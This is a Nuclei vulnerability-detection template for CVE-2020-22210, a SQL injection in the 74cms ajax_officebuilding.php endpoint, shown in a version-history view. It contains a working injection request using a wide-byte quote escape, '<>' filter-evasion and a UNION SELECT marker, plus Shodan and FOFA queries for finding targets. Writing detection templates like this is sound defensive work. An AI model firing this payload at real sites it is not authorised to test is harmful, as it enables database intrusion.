nuclei-templates/cves/2020/CVE-2020-22210.yaml

37 lines
957 B
YAML
Raw Normal View History

2022-06-05 10:40:20 +00:00
id: CVE-2020-22210
info:
name: 74cms - ajax_officebuilding.php SQL Injection
2022-06-05 10:40:20 +00:00
author: ritikchaddha
severity: critical
description: |
A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
2022-06-05 10:40:20 +00:00
reference:
- https://github.com/blindkey/cve_like/issues/11
2022-06-05 11:02:35 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-22210
2022-06-05 10:40:20 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-22210
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
2022-06-28 09:39:49 +00:00
shodan-query: http.html:"74cms"
2022-06-05 10:40:20 +00:00
tags: cve,cve2020,74cms,sqli
2022-06-30 02:57:56 +00:00
variables:
num: "999999999"
2022-06-05 10:40:20 +00:00
requests:
- method: GET
path:
2022-06-30 02:57:56 +00:00
- '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
2022-06-05 10:40:20 +00:00
matchers:
- type: word
part: body
words:
2022-06-30 02:57:56 +00:00
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21